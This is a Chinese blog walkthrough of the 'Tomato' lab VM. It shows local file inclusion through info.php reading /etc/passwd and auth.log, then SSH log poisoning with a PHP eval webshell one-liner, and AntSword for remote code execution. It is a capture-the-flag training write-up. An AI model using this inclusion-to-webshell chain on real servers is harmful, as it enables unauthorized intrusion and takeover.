当前位置: 首页 > news >正文

Tomato靶机攻略

news 2025/3/14 15:22:16

将tomato改为NAT模式

扫描ip

arp-scan -l

 扫描端口,发现ssh服务端口从22改为2211

扫描目录 

 

 发现http://192.168.31.134/antibot_image/  访问

 查看所有php文件的源码,看看有什么不同的地方

在info.php的源码中发现问题

 在输入后,成功显示,说明文件包含漏洞

info.php?image=/etc/passwd

 

 通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志

 info.php?image=/var/log/auth.log

 

 使用ssh登录,看日志里会不会出现记录

 发现日志中有记录

 使用kali,让一句话木马写入日志中

ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,

我的kali写入失败,选择用xshell连接

 

之后点击连接,当然肯定会失败,日志记录了就可以

使用中国蚁剑连接


http://www.mrgr.cn/news/94210.html

相关文章:

  • Hashmap 键值对的value发生变化,是否需要重新put ?
  • Redis Sentinel (哨兵模式)深度解析:构建高可用分布式缓存系统的核心机制
  • 【深度学习】多元物料融合算法(一):量纲对齐常见方法
  • Linux机器之间排查网络连通问题
  • winform中chart控件解决显示大量曲线数据卡顿方法——删旧添新法
  • AI自动化编程初探
  • 机器人路径规划、轨迹优化系列课程
  • k8s面经
  • Django与模板
  • 27_Java2DRenderer结合freemarker动态生成图片
  • 【Linux内核系列】:文件系统
  • 本地部署 OpenManus 保姆级教程(Windows 版)
  • 关于WPS的Excel点击单元格打开别的文档的两种方法的探究【为单元格添加超链接】
  • 11 | 给 Gin 服务器添加中间件
  • Spring之生命周期Bean的生成过程
  • 看 MySQL InnoDB 和 BoltDB 如何写磁盘
  • uni-app打包成H5使用相对路径
  • C# Enumerable类 之 集合操作
  • c#面试题整理9
  • linux - ubuntu 使用时一些小问题整理 --- 持续更新